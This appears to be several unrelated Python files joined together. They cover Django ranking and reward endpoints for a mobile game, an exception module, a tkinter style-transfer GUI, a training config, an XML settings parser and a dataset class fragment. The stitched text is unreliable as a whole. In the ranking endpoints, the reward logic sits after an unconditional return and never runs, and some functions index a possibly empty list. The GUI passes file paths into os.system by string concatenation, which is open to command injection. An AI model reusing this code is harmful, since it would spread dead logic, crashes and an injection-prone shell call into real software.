myItem = list(ItemData.objects.filter(UserSN = request.POST.get('SN'), ItemSN = reward.ItemSN))
if len(myItem) > 0:
myItem[0].Value = myItem[0].Value + reward.Value
myItem[0].save()
else:
itemdata = ItemData(UserSN = request.POST.get('SN'), ItemSN = reward.ItemSN, Value = reward.Value)
itemdata.save()
data['Type'] = reward.Type
data['ItemSN'] = reward.ItemSN
data['Value'] = reward.Value
RewardData.append(data)
SendData['RankData'] = friendRankList
SendData['RewardData'] = RewardData
return HttpResponse(myUtil.JsonPaser(SendData), content_type='application/json')
#-------------------------------------------------------------------------------
# 무한모드 전주간랭킹
"""
호출 값
SN = 유저SN.
Auth = 인증 토큰.
리턴값
SendData['MyRank'] = 내랭크.
SendData['MyReward'] = 보상 값.
RankData
data['UserSN'] = rankData.UserSN
data['Score'] = rankData.Score
data['UserName'] = myUtil.encodeStr(userData[0].UserName)
data['PictureURL']
"""
@csrf_exempt
def InfiniteLastWeekRankResponse(request):
# 호출인자 검사.
if request.method == 'GET':
data = {
'ErrorCode' : '99',
'Message' : 'error',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
if not request.POST.get('SN'):
data = {
'ErrorCode' : '101',
'Message' : 'SN does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
elif not request.POST.get('Auth'):
data = {
'ErrorCode' : '102',
'Message' : 'Auth does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
user = list(UserData.objects.filter(id = request.POST.get('SN')))
if len(user) == 0:
data = {
'ErrorCode' : '103',
'Message' : 'UserData does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
user = user[0]
if user.Auth != request.POST.get('Auth'):
data = {
'ErrorCode' : '104',
'Message' : 'Auth is invalid.',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
# 결과 처리.
# 랭킹확인여부.
confirmData = list(InfiniteLastWeekRankData.objects.filter(UserSN = request.POST.get('SN')))
if len(confirmData) == 0 or confirmData[0].Confirm == True:
return HttpResponse('', content_type='application/json')
confirmData[0].Confirm = True
confirmData[0].save()
data = {
'IsReward' : False,
'RewardValue' : 0,
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
RankList = []
SendData = {}
cnt = 1
for rankData in list(InfiniteLastWeekRankData.objects.order_by('-Score')):
userData = list(UserData.objects.filter(id = rankData.UserSN))
data = {}
data['UserSN'] = rankData.UserSN
data['Score'] = rankData.Score
data['Rank'] = cnt
if len(userData) > 0:
data['UserName'] = myUtil.encodeStr(userData[0].UserName)
data['PictureURL'] = userData[0].PictureURL
RankList.append(data)
if rankData.Score > 0:
# 보상처리.
if cnt == 1 and request.POST.get('SN') == rankData.UserSN:
UserList = list(MoneyData.objects.filter(UserSN = rankData.UserSN))
if len(UserList) > 0:
MoneyData = UserList[0]
MoneyData.CashValue = 5
MoneyData.save()
SendData['MyRank'] = 1
SendData['MyReward'] = 5
elif cnt == 2 and request.POST.get('SN') == rankData.UserSN:
UserList = list(MoneyData.objects.filter(UserSN = rankData.UserSN))
if len(UserList) > 0:
MoneyData = UserList[0]
MoneyData.GoldValue = 5
MoneyData.save()
SendData['MyRank'] = 2
SendData['MyReward'] = 5
elif cnt == 3 and request.POST.get('SN') == rankData.UserSN:
itemdata = ItemData(UserSN = rankData.UserSN, ItemSN = 1)
itemdata.save()
SendData['MyRank'] = 3
SendData['MyReward'] = 1
cnt = cnt + 1
SendData['RankData'] = RankList
return HttpResponse(myUtil.JsonPaser(SendData), content_type='application/json')
#-------------------------------------------------------------------------------
# 타임어택 전주간랭킹
"""
호출 값
SN = 유저SN.
Auth = 인증 토큰.
리턴값
data['UserSN'] = rankData.UserSN
data['Score'] = rankData.Score
"""
@csrf_exempt
def TimeAttackLastWeekRankResponse(request):
# 호출인자 검사.
if request.method == 'GET':
data = {
'ErrorCode' : '99',
'Message' : 'error',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
if not request.POST.get('SN'):
data = {
'ErrorCode' : '101',
'Message' : 'SN does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
elif not request.POST.get('Auth'):
data = {
'ErrorCode' : '102',
'Message' : 'Auth does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
user = list(UserData.objects.filter(id = request.POST.get('SN')))
if len(user) == 0:
data = {
'ErrorCode' : '103',
'Message' : 'UserData does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
user = user[0]
if user.Auth != request.POST.get('Auth'):
data = {
'ErrorCode' : '104',
'Message' : 'Auth is invalid.',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
# 결과 처리.
# 랭킹확인여부.
confirmData = list(TimeAttackLastWeekRankData.objects.filter(UserSN = request.POST.get('SN')))
if len(confirmData) == 0 or confirmData[0].Confirm == True:
return HttpResponse('', content_type='application/json')
confirmData[0].Confirm = True
confirmData[0].save()
data = {
'IsReward' : False,
'RewardValue' : 0,
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
RankList = []
SendData = {}
cnt = 1
for rankData in list(TimeAttackLastWeekRankData.objects.order_by('-Score')):
data = {}
data['UserSN'] = rankData.UserSN
data['Score'] = rankData.Score
data['Rank'] = cnt
RankList.append(data)
if rankData.Score > 0:
# 보상처리.
if cnt == 1 and request.POST.get('SN') == rankData.UserSN:
UserList = list(MoneyData.objects.filter(UserSN = rankData.UserSN))
if len(UserList) > 0:
MoneyData = UserList[0]
MoneyData.CashValue = 5
MoneyData.save()
SendData['MyRank'] = 1
SendData['MyReward'] = 5
elif cnt == 2 and request.POST.get('SN') == rankData.UserSN:
UserList = list(MoneyData.objects.filter(UserSN = rankData.UserSN))
if len(UserList) > 0:
MoneyData = UserList[0]
MoneyData.GoldValue = 5
MoneyData.save()
SendData['MyRank'] = 2
SendData['MyReward'] = 5
elif cnt == 3 and request.POST.get('SN') == rankData.UserSN:
itemdata = ItemData(UserSN = rankData.UserSN, ItemSN = 1)
itemdata.save()
SendData['MyRank'] = 3
SendData['MyReward'] = 1
cnt = cnt + 1
SendData['RankData'] = RankList
return HttpResponse(myUtil.JsonPaser(SendData), content_type='application/json')
#-------------------------------------------------------------------------------
# 무한모드 전월간랭킹
"""
호출 값
SN = 유저SN.
Auth = 인증 토큰.
리턴값
data['UserSN'] = rankData.UserSN
data['Score'] = rankData.Score
"""
@csrf_exempt
def InfiniteLastMonthRankResponse(request):
# 호출인자 검사.
if request.method == 'GET':
data = {
'ErrorCode' : '99',
'Message' : 'error',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
if not request.POST.get('SN'):
data = {
'ErrorCode' : '101',
'Message' : 'SN does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
elif not request.POST.get('Auth'):
data = {
'ErrorCode' : '102',
'Message' : 'Auth does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
user = list(UserData.objects.filter(id = request.POST.get('SN')))
if len(user) == 0:
data = {
'ErrorCode' : '103',
'Message' : 'UserData does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
user = user[0]
if user.Auth != request.POST.get('Auth'):
data = {
'ErrorCode' : '104',
'Message' : 'Auth is invalid.',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
# 결과 처리.
# 랭킹확인여부.
confirmData = list(InfiniteLastMonthRankData.objects.filter(UserSN = request.POST.get('SN')))
if len(confirmData) > 0 and confirmData[0].Confirm == True:
return HttpResponse('', content_type='application/json')
confirmData[0].Confirm = True
confirmData[0].save()
data = {
'IsReward' : False,
'RewardValue' : 0,
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
RankList = []
SendData = {}
cnt = 1
for rankData in list(InfiniteLastMonthRankData.objects.order_by('-Score')):
data = {}
data['UserSN'] = rankData.UserSN
data['Score'] = rankData.Score
data['Rank'] = cnt
RankList.append(data)
if rankData.Score > 0:
# 보상처리.
if cnt == 1 and request.POST.get('SN') == rankData.UserSN:
UserList = list(MoneyData.objects.filter(UserSN = rankData.UserSN))
if len(UserList) > 0:
MoneyData = UserList[0]
MoneyData.CashValue = 5
MoneyData.save()
SendData['MyRank'] = 1
SendData['MyReward'] = 5
elif cnt == 2 and request.POST.get('SN') == rankData.UserSN:
UserList = list(MoneyData.objects.filter(UserSN = rankData.UserSN))
if len(UserList) > 0:
MoneyData = UserList[0]
MoneyData.GoldValue = 5
MoneyData.save()
SendData['MyRank'] = 2
SendData['MyReward'] = 5
elif cnt == 3 and request.POST.get('SN') == rankData.UserSN:
itemdata = ItemData(UserSN = rankData.UserSN, ItemSN = 1)
itemdata.save()
SendData['MyRank'] = 3
SendData['MyReward'] = 1
cnt = cnt + 1
SendData['RankData'] = RankList
return HttpResponse(myUtil.JsonPaser(SendData), content_type='application/json')
#-------------------------------------------------------------------------------
# 타임어택 전월간랭킹
"""
호출 값
SN = 유저SN.
Auth = 인증 토큰.
리턴값
data['UserSN'] = rankData.UserSN
data['Score'] = rankData.Score
"""
@csrf_exempt
def TimeAttackLastMonthRankResponse(request):
# 호출인자 검사.
if request.method == 'GET':
data = {
'ErrorCode' : '99',
'Message' : 'error',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
if not request.POST.get('SN'):
data = {
'ErrorCode' : '101',
'Message' : 'SN does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
elif not request.POST.get('Auth'):
data = {
'ErrorCode' : '102',
'Message' : 'Auth does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
user = list(UserData.objects.filter(id = request.POST.get('SN')))
if len(user) == 0:
data = {
'ErrorCode' : '103',
'Message' : 'UserData does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
user = user[0]
if user.Auth != request.POST.get('Auth'):
data = {
'ErrorCode' : '104',
'Message' : 'Auth is invalid.',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
# 결과 처리.
# 랭킹확인여부.
confirmData = list(TimeAttackLastMonthRankData.objects.filter(UserSN = request.POST.get('SN')))
if len(confirmData) > 0 and confirmData[0].Confirm == True:
return HttpResponse('', content_type='application/json')
confirmData[0].Confirm = True
confirmData[0].save()
data = {
'IsReward' : False,
'RewardValue' : 0,
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
RankList = []
SendData = {}
cnt = 1
for rankData in list(TimeAttackLastMonthRankData.objects.order_by('-Score')):
data = {}
data['UserSN'] = rankData.UserSN
data['Score'] = rankData.Score
data['Rank'] = cnt
RankList.append(data)
if rankData.Score > 0:
# 보상처리.
if cnt == 1 and request.POST.get('SN') == rankData.UserSN:
UserList = list(MoneyData.objects.filter(UserSN = rankData.UserSN))
if len(UserList) > 0:
MoneyData = UserList[0]
MoneyData.CashValue = 5
MoneyData.save()
SendData['MyRank'] = 1
SendData['MyReward'] = 5
elif cnt == 2 and request.POST.get('SN') == rankData.UserSN:
UserList = list(MoneyData.objects.filter(UserSN = rankData.UserSN))
if len(UserList) > 0:
MoneyData = UserList[0]
MoneyData.GoldValue = 5
MoneyData.save()
SendData['MyRank'] = 2
SendData['MyReward'] = 5
elif cnt == 3 and request.POST.get('SN') == rankData.UserSN:
itemdata = ItemData(UserSN = rankData.UserSN, ItemSN = 1)
itemdata.save()
SendData['MyRank'] = 3
SendData['MyReward'] = 1
cnt = cnt + 1
SendData['RankData'] = RankList
return HttpResponse(myUtil.JsonPaser(SendData), content_type='application/json')
#-------------------------------------------------------------------------------
# 랭킹 초기화 시간 가져오기.
"""
호출 값
SN = 유저SN.
Auth = 인증 토큰.
리턴값
SendData['Week'] = 주간랭킹 남은초.
SendData['Month'] = 뭘간랭킹 남은초.
SendData['Friend'] = 친구 주간랭킹 남은초.
"""
@csrf_exempt
def InitRankTimeResponse(request):
# 호출인자 검사.
if request.method == 'GET':
data = {
'ErrorCode' : '99',
'Message' : 'error',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
if not request.POST.get('SN'):
data = {
'ErrorCode' : '101',
'Message' : 'SN does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
elif not request.POST.get('Auth'):
data = {
'ErrorCode' : '102',
'Message' : 'Auth does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
user = list(UserData.objects.filter(id = request.POST.get('SN')))
if len(user) == 0:
data = {
'ErrorCode' : '103',
'Message' : 'UserData does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
user = user[0]
if user.Auth != request.POST.get('Auth'):
data = {
'ErrorCode' : '104',
'Message' : 'Auth is invalid.',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
# 결과 처리.
rankData = list(RankInfoData.objects.all())[0]
SendData = {}
SendData['Week'] = myUtil.ToSecRemaining(rankData.WeekInitTime)
SendData['Month'] = myUtil.ToSecRemaining(rankData.MonthInitTime)
SendData['Friend'] = myUtil.ToSecRemaining(rankData.FriendInitTime)
return HttpResponse(myUtil.JsonPaser(SendData), content_type='application/json')
#-------------------------------------------------------------------------------
# 치킨 주간랭킹 초기화 여부.
"""
호출 값
SN = 유저SN.
Auth = 인증 토큰.
리턴값
Confirm = 주간랭킹 확인여부.
"""
@csrf_exempt
def IsChickenLastWeekRank(request):
# 호출인자 검사.
if request.method == 'GET':
data = {
'ErrorCode' : '99',
'Message' : 'error',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
if not request.POST.get('SN'):
data = {
'ErrorCode' : '101',
'Message' : 'SN does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
elif not request.POST.get('Auth'):
data = {
'ErrorCode' : '102',
'Message' : 'Auth does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
user = list(UserData.objects.filter(id = request.POST.get('SN')))
if len(user) == 0:
data = {
'ErrorCode' : '103',
'Message' : 'UserData does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
user = user[0]
if user.Auth != request.POST.get('Auth'):
data = {
'ErrorCode' : '104',
'Message' : 'Auth is invalid.',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
# 결과 처리.
SendData = {}
SendData['Confirm'] = True;
# 랭킹확인여부.
confirmData = list(InfiniteLastWeekRankData.objects.filter(UserSN = request.POST.get('SN')))
if len(confirmData) > 0 and confirmData[0].Confirm == False:
SendData['Confirm'] = False;
confirmData = list(TimeAttackLastWeekRankData.objects.filter(UserSN = request.POST.get('SN')))
if len(confirmData) > 0 and confirmData[0].Confirm == False:
SendData['Confirm'] = False;
return HttpResponse(myUtil.JsonPaser(SendData), content_type='application/json')
#-------------------------------------------------------------------------------
# 치킨 월간랭킹 초기화 여부.
"""
호출 값
SN = 유저SN.
Auth = 인증 토큰.
리턴값
Confirm = 월간랭킹 확인여부.
"""
@csrf_exempt
def IsChickenLastMonthRank(request):
# 호출인자 검사.
if request.method == 'GET':
data = {
'ErrorCode' : '99',
'Message' : 'error',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
if not request.POST.get('SN'):
data = {
'ErrorCode' : '101',
'Message' : 'SN does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
elif not request.POST.get('Auth'):
data = {
'ErrorCode' : '102',
'Message' : 'Auth does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
user = list(UserData.objects.filter(id = request.POST.get('SN')))
if len(user) == 0:
data = {
'ErrorCode' : '103',
'Message' : 'UserData does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
user = user[0]
if user.Auth != request.POST.get('Auth'):
data = {
'ErrorCode' : '104',
'Message' : 'Auth is invalid.',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
# 결과 처리.
SendData = {}
SendData['Confirm'] = True;
# 랭킹확인여부.
confirmData = list(InfiniteLastMonthRankData.objects.filter(UserSN = request.POST.get('SN')))
if len(confirmData) > 0 and confirmData[0].Confirm == False:
SendData['Confirm'] = False;
confirmData = list(TimeAttackLastMonthRankData.objects.filter(UserSN = request.POST.get('SN')))
if len(confirmData) > 0 and confirmData[0].Confirm == False:
SendData['Confirm'] = False;
return HttpResponse(myUtil.JsonPaser(SendData), content_type='application/json')
|
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: MIT-0
"""Resource Name CloudFormation Custom Resource"""
from . import lambda_function
__all__ = ["lambda_function"]
|
# GOAL: Handle exceptions for SmtApi.
# Take a HTTP response object and translate it into an Exception
# instance.
def handle_error_response(resp):
# Mapping of API response codes to exception classes
codes = {
-1: SmtApiError,
'400': BadRequest,
'401': AuthFail,
'403': HeaderMissing,
'500': GenericError,
}
error = resp.json().get('error', {})
message = error.get('errorMessage')
code = error.get('errorCode', -1)
data = error.get('errorKey', {})
# Build the appropriate exception class with as much
# data as we can pull from the API response and raise
# it.
raise codes[code](message=message, code=code, data=data, response=resp)
class SmtApiError(Exception):
response = None
data = {}
code = -1
message = "An unknown error occurred"
def __init__(self, message=None, code=None, data={}, response=None):
self.response = response
if message:
self.message = message
if code:
self.code = code
if data:
self.data = data
def __str__(self):
if self.code:
return '{}: {}'.format(self.code, self.message)
return self.message
# Specific exception classes
class BadRequest(SmtApiError):
pass
class AuthFail(SmtApiError):
pass
class HeaderMissing(SmtApiError):
pass
class GenericError(SmtApiError):
pass |
from tkinter import filedialog
from tkinter import *
from PIL import Image
import os
s_path = 'C:\\Users\\BRUNO\\Desktop\\CNN\\UST\\van_gogh.png'
c_path = 'C:\\Users\\BRUNO\\Desktop\\CNN\\UST\\tiger.png'
output_path = 'C:\\Users\\BRUNO\\Desktop\\CNN\\UST\\outputs'
def run():
alpha = str(alpha_scale.get()/100)
mastercode = 'python stylize.py --checkpoints models/relu5_1 models/relu4_1 models/relu3_1 models/relu2_1 models/relu1_1 --relu-targets relu5_1 relu4_1 relu3_1 relu2_1 relu1_1 --style-size 512 --alpha ' + alpha + ' --style-path ' + s_path + ' --content-path ' + c_path + ' --out-path ' + output_path
print(mastercode)
os.system(mastercode)
window = Tk()
#Geometria da janela (width x height + left distance + top distance)
window.geometry("1000x800+50+50")
def import_style():
global s_path
window.filename = filedialog.askopenfilename(initialdir = "/",title = "Select file",filetypes = (("png files","*.png"),("all files","*.*")))
s_path = window.filename
s_path = s_path.replace('/','\\')
#change_style()
def import_content():
global c_path
window.filename = filedialog.askopenfilename(initialdir = "/",title = "Select file",filetypes = (("png files","*.png"),("all files","*.*")))
c_path = window.filename
c_path = c_path.replace('/','\\')
def save_output():
global output_path
window.filename = filedialog.askdirectory()
output_path = window.filename
output_path = output_path.replace('/','\\')
def change_style():
#import image with PIL
style_example = Image.open(s_path)
#resize to new (width, height)
style_example = style_example.resize((200,200), Image.ANTIALIAS)
#convert to tkinter format
style_example.save("pic1.ppm", "ppm")
pic1 = PhotoImage(file='pic1.ppm')
lb2 = Label(window, image = pic1)
lb2.place(x=400, y=150)
alpha_scale = Scale(window, from_=0, to=100, length=500,tickinterval=10, orient=HORIZONTAL)
alpha_scale.set(60)
alpha_scale.place(x=100, y=500)
#change_style()
lb1 = Label(window, text="Universal Style Transfer - Graphical User Interface", bd=16, relief="sunken", font = 'Times 28')
lb1.place(x=120, y=50)
#import image with PIL
#style_example = Image.open(s_path)
#resize to new (width, height)
#style_example = style_example.resize((200,200), Image.ANTIALIAS)
#convert to tkinter format
#style_example.save("pic1.ppm", "ppm")
#pic1 = PhotoImage(file='pic1.ppm')
#lb2 = Label(window, image = pic1, bd=16, relief="ridge")
#lb2.place(x=400, y=150)
#lb_plus = Label(window, text = '+', font = 'Times 40')
#lb_plus.place(x=350, y=240)
#import image with PIL
#content_example = Image.open(c_path)
#resize to new (width, height)
#content_example = content_example.resize((200,200), Image.ANTIALIAS)
#convert to tkinter format
#content_example.save("pic2.ppm", "ppm")
#pic2 = PhotoImage(file='pic2.ppm')
#lb3 = Label(window, image = pic2, bd=16, relief="ridge")
#lb3.place(x=100, y=150)
#lb_equal = Label(window, text = '=', font = 'Times 40')
#lb_equal.place(x=650, y=240)
#lb_alpha = Label(window, text = 'Style Parameter', font = 'Times 20', bd=8, relief ='ridge')
#lb_alpha.place(x=650, y=500)
#import image with PIL
#output_example = Image.open(output_path + '\\tiger_van_gogh.png')
#resize to new (width, height)
#output_example = output_example.resize((200,200), Image.ANTIALIAS)
#convert to tkinter format
#output_example.save("pic3.ppm", "ppm")
#pic3 = PhotoImage(file='pic3.ppm')
#lb4 = Label(window, image = pic3, bd=16, relief="ridge")
#lb4.place(x=700, y=150)
bt1 = Button(window, width=20, text="Style Image", command = import_style)
bt1.place(x=100, y=650)
bt2 = Button(window, width=20, text="Content Image", command = import_content)
bt2.place(x=100, y=700)
bt3 = Button(window, width=20, text="Output Folder", command = save_output)
bt3.place(x=500, y=680)
bt4 = Button(window, width=20, text="Run", command = run)
bt4.place(x=800, y=680)
window.mainloop() |
import os
from easydict import EasyDict as edict
cfg1 = edict()
cfg1.PATH = edict()
cfg1.PATH.DATA = ['/home/liuhaiyang/dataset/CUB_200_2011/images.txt',
'/home/liuhaiyang/dataset/CUB_200_2011/train_test_split.txt',
'/home/liuhaiyang/dataset/CUB_200_2011/images/']
cfg1.PATH.LABEL = '/home/liuhaiyang/dataset/CUB_200_2011/image_class_labels.txt'
cfg1.PATH.EVAL = ['/home/liuhaiyang/dataset/CUB_200_2011/images.txt',
'/home/liuhaiyang/dataset/CUB_200_2011/train_test_split.txt',
'/home/liuhaiyang/dataset/CUB_200_2011/images/']
cfg1.PATH.TEST = '/home/liuhaiyang/liu_kaggle/cifar/dataset/cifar-10-batches-py/data_batch_1'
cfg1.PATH.RES_TEST = './res_imgs/'
cfg1.PATH.EXPS = './exps/'
cfg1.PATH.NAME = 'eff_cub_v2_stone'
cfg1.PATH.MODEL = '/model.pth'
cfg1.PATH.BESTMODEL = '/bestmodel.pth'
cfg1.PATH.LOG = '/log.txt'
cfg1.PATH.RESULTS = '/results/'
cfg1.DETERMINISTIC = edict()
cfg1.DETERMINISTIC.SEED = 60
cfg1.DETERMINISTIC.CUDNN = True
cfg1.TRAIN = edict()
cfg1.TRAIN.EPOCHS = 60
cfg1.TRAIN.BATCHSIZE = 8
cfg1.TRAIN.L1SCALING = 100
cfg1.TRAIN.TYPE = 'sgd'
cfg1.TRAIN.LR = 1e-3
cfg1.TRAIN.BETA1 = 0.9
cfg1.TRAIN.BETA2 = 0.999
cfg1.TRAIN.LR_TYPE = 'cos'
cfg1.TRAIN.LR_REDUCE = [26,36]
cfg1.TRAIN.LR_FACTOR = 0.1
cfg1.TRAIN.WEIGHT_DECAY = 1e-4
cfg1.TRAIN.NUM_WORKERS = 16
cfg1.TRAIN.WARMUP = 0
cfg1.TRAIN.LR_WARM = 1e-7
#-------- data aug --------#
cfg1.TRAIN.USE_AUG = True
cfg1.TRAIN.CROP = 224
cfg1.TRAIN.PAD = 0
cfg1.TRAIN.RESIZE = 300
cfg1.TRAIN.ROATION = 30
cfg1.MODEL = edict()
cfg1.MODEL.NAME = 'regnet'
cfg1.MODEL.IN_DIM = 3
cfg1.MODEL.CLASS_NUM = 200
cfg1.MODEL.USE_FC = True
cfg1.MODEL.PRETRAIN = None
cfg1.MODEL.PRETRAIN_PATH = './exps/pretrain/'
cfg1.MODEL.DROPOUT = 0
cfg1.MODEL.LOSS = 'bce_only_g'
#-------- for resnet --------#
cfg1.MODEL.BLOCK = 'bottleneck'
cfg1.MODEL.BLOCK_LIST = [3,4,6,3]
cfg1.MODEL.CONV1 = (7,2,3)
cfg1.MODEL.OPERATION = 'B'
cfg1.MODEL.STRIDE1 = 1
cfg1.MODEL.MAX_POOL = True
cfg1.MODEL.BASE = 64
#-------- for regnet --------#
cfg1.MODEL.REGNET = edict()
cfg1.MODEL.REGNET.STEM_TYPE = "simple_stem_in"
cfg1.MODEL.REGNET.STEM_W = 32
cfg1.MODEL.REGNET.BLOCK_TYPE = "res_bottleneck_block"
cfg1.MODEL.REGNET.STRIDE = 2
cfg1.MODEL.REGNET.SE_ON = True
cfg1.MODEL.REGNET.SE_R = 0.25
cfg1.MODEL.REGNET.BOT_MUL = 1.0
cfg1.MODEL.REGNET.DEPTH = 20
cfg1.MODEL.REGNET.W0 = 232
cfg1.MODEL.REGNET.WA = 115.89
cfg1.MODEL.REGNET.WM = 2.53
cfg1.MODEL.REGNET.GROUP_W = 232
#-------- for anynet -------#
cfg1.MODEL.ANYNET = edict()
cfg1.MODEL.ANYNET.STEM_TYPE = "res_stem_in"
cfg1.MODEL.ANYNET.STEM_W = 64
cfg1.MODEL.ANYNET.BLOCK_TYPE = "res_bottleneck_block"
cfg1.MODEL.ANYNET.STRIDES = [1,2,2,2]
cfg1.MODEL.ANYNET.SE_ON = False
cfg1.MODEL.ANYNET.SE_R = 0.25
cfg1.MODEL.ANYNET.BOT_MULS = [0.5,0.5,0.5,0.5]
cfg1.MODEL.ANYNET.DEPTHS = [3,4,6,3]
cfg1.MODEL.ANYNET.GROUP_WS = [4,8,16,32]
cfg1.MODEL.ANYNET.WIDTHS = [256,512,1024,2048]
#-------- for effnet --------#
cfg1.MODEL.EFFNET = edict()
cfg1.MODEL.EFFNET.STEM_W = 32
cfg1.MODEL.EFFNET.EXP_RATIOS = [1,6,6,6,6,6,6]
cfg1.MODEL.EFFNET.KERNELS = [3,3,5,3,5,5,3]
cfg1.MODEL.EFFNET.HEAD_W = 1408
cfg1.MODEL.EFFNET.DC_RATIO = 0.0
cfg1.MODEL.EFFNET.STRIDES = [1,2,2,2,1,2,1]
cfg1.MODEL.EFFNET.SE_R = 0.25
cfg1.MODEL.EFFNET.DEPTHS = [2, 3, 3, 4, 4, 5, 2]
cfg1.MODEL.EFFNET.GROUP_WS = [4,8,16,32]
cfg1.MODEL.EFFNET.WIDTHS = [16,24,48,88,120,208,352]
cfg1.GPUS = [0]
cfg1.PRINT_FRE = 300
cfg1.DATASET_TRPE = 'cub200_2011'
cfg1.SHORT_TEST = False
if __name__ == "__main__":
from utils import load_cfg1
logger = load_cfg1(cfg1)
print(cfg1)
|
# -*- coding: utf-8 -*-
"""
Created on 20170704 21:15:19
@author: Thawann Malfatti
Loads info from the settings.xml file.
Examples:
File = '/Path/To/Experiment/settings.xml
# To get all info the xml file can provide:
AllInfo = SettingsXML.XML2Dict(File)
# AllInfo will be a dictionary following the same structure of the XML file.
# To get info only about channels recorded:
RecChs = SettingsXML.GetRecChs(File)[0]
# To get also the processor names:
RecChs, PluginNames = SettingsXML.GetRecChs(File)
# RecChs will be a dictionary:
#
# RecChs
# ProcessorNodeId
# ChIndex
# 'name'
# 'number'
# 'gain'
# 'PluginName'
"""
from xml.etree import ElementTree
def FindRecProcs(Ch, Proc, RecChs):
ChNo = Ch['number']
Rec = Proc['CHANNEL'][ChNo]['SELECTIONSTATE']['record']
if Rec == '1':
if Proc['NodeId'] not in RecChs: RecChs[Proc['NodeId']] = {}
RecChs[Proc['NodeId']][ChNo] = Ch
return(RecChs)
def Root2Dict(El):
Dict = {}
if El.getchildren():
for SubEl in El:
if SubEl.keys():
if SubEl.get('name'):
if SubEl.tag not in Dict: Dict[SubEl.tag] = {}
Dict[SubEl.tag][SubEl.get('name')] = Root2Dict(SubEl)
Dict[SubEl.tag][SubEl.get('name')].update(
{K: SubEl.get(K) for K in SubEl.keys() if K is not 'name'}
)
else:
Dict[SubEl.tag] = Root2Dict(SubEl)
Dict[SubEl.tag].update(
{K: SubEl.get(K) for K in SubEl.keys() if K is not 'name'}
)
else: Dict[SubEl.tag] = Root2Dict(SubEl)
return(Dict)
else:
if El.items(): return(dict(El.items()))
else: return(El.text)
def XML2Dict(File):
Tree = ElementTree.parse(File); Root = Tree.getroot()
Info = Root2Dict(Root)
return(Info)
def GetRecChs(File):
Info = XML2Dict(File)
RecChs = {}; ProcNames = {}
for P, Proc in Info['SIGNALCHAIN']['PROCESSOR'].items():
if 'isSource' in Proc:
if Proc['isSource'] == '1': SourceProc = P[:]
else:
if Proc['name'].split('/')[0] == 'Sources': SourceProc = P[:]
if 'CHANNEL_INFO' in Proc and Proc['CHANNEL_INFO']:
for Ch in Proc['CHANNEL_INFO']['CHANNEL'].values():
RecChs = FindRecProcs(Ch, Proc, RecChs)
elif 'CHANNEL' in Proc:
for Ch in Proc['CHANNEL'].values():
RecChs = FindRecProcs(Ch, Proc, RecChs)
else: continue
if 'pluginName' in Proc:
ProcNames[Proc['NodeId']] = Proc['pluginName']
else:
ProcNames[Proc['NodeId']] = Proc['name']
if Info['SIGNALCHAIN']['PROCESSOR'][SourceProc]['CHANNEL_INFO']:
SourceProc = Info['SIGNALCHAIN']['PROCESSOR'][SourceProc]['CHANNEL_INFO']['CHANNEL']
else:
SourceProc = Info['SIGNALCHAIN']['PROCESSOR'][SourceProc]['CHANNEL']
for P, Proc in RecChs.items():
for C, Ch in Proc.items():
if 'gain' not in Ch:
RecChs[P][C].update([c for c in SourceProc.values() if c['number'] == C][0])
return(RecChs, ProcNames)
|
from .src.models import * |
import random
import numpy as np
import cv2
import lmdb
import torch
import torch.utils.data as data
import data.util as util
class CrossnetDataset(data.Dataset):
"""
Read LQ (Low Quality, e.g. LR (Low Resolution), blurry, etc) and GT image pairs.
If only GT images are provided, generate LQ images on-the-fly.
"""
def __init__(self, opt):
super(CrossnetDataset, self).__init__()
self.opt = opt
self.data_type = self.opt['data_type']
self.paths_LQ_UX4, self.paths_Ref, self.paths_SR, self.paths_GT = None, None, None, None
self.sizes_LQ_UX4, self.sizes_Ref, self.sizes_SR, self.sizes_GT = None, None, None, None
self.LQ_UX4_env, self.Ref_env, self.SR_env, self.GT_env = None, None, None, None # environments for lmdb
